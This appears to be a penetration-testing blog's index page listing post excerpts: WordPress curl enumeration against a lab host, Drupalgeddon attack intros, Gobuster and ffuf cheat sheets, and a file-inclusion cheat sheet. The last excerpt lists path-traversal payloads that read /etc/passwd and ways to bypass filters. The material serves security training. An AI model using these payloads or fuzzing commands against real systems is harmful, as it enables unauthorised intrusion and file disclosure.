WebPentest – NetwerkLABS

Web Attacks

Enumeration & Brute Force Authentication enumeration is a fundamental aspect of security testing, concentrating specifically on the mechanisms that protect sensitive aspects of web applications; this process involves methodically inspecting…

Bharath Narayanasamy

Enumeration WebPentest

CURL

Wordpress curl -s http://blog.inlanefreight.local | grep WordPress curl -s http://blog.inlanefreight.local/ | grep themes curl -s http://blog.inlanefreight.local/ | grep plugins curl -s http://blog.inlanefreight.local/?p=1 | grep plugins

Bharath Narayanasamy

PenTest WebPentest

Attacking Drupal

Leveraging Known Vulnerabilities Over the years, Drupal core has suffered from a few serious remote code execution vulnerabilities, each dubbed Drupalgeddon. At the time of writing, there are 3 Drupalgeddon vulnerabilities…

Bharath Narayanasamy

WebPentest

Attacking CMS – WordPress

Bharath Narayanasamy

WebPentest

Attacking CMS – Drupal

Bharath Narayanasamy

WebPentest

Attacking CMS – Joomla

Bharath Narayanasamy

WebPentest Enumeration

Gobuster Cheat Sheet

Common Gobuster Commands dir Mode gobuster dir -u https://nlabs.local -w ~/wordlists/shortlist.txt With content length gobuster dir -u https://nlabs.local -w ~/wordlists/shortlist.txt -l dns Mode gobuster dns -d nlabs.local -t 50 -w…

Bharath Narayanasamy

WebPentest Web Enumeration

Complete Guide on ffuf

In web application penetration testing, entry points are areas of an application where a user can input data or interact with the system, which an attacker could potentially exploit. Identifying…

Bharath Narayanasamy

Enumeration WebPentest

Fuff – Cheat Sheet

Ffuf commands CommandDescriptionffuf -hffuf helpffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZDirectory Fuzzingffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZExtension Fuzzingffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.phpPage Fuzzingffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -vRecursive…

Bharath Narayanasamy

WebPentest

File Inclusion – Cheat Sheet

Local File Inclusion CommandDescription Basic LFI /index.php?language=/etc/passwdBasic LFI /index.php?language=../../../../etc/passwdLFI with path traversal /index.php?language=/../../../etc/passwdLFI with name prefix /index.php?language=./languages/../../../../etc/passwdLFI with approved path LFI Bypasses /index.php?language=....//....//....//....//etc/passwdBypass basic path traversal filter /index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64Bypass filters with URL encoding /index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]Bypass appended extension with…

Bharath Narayanasamy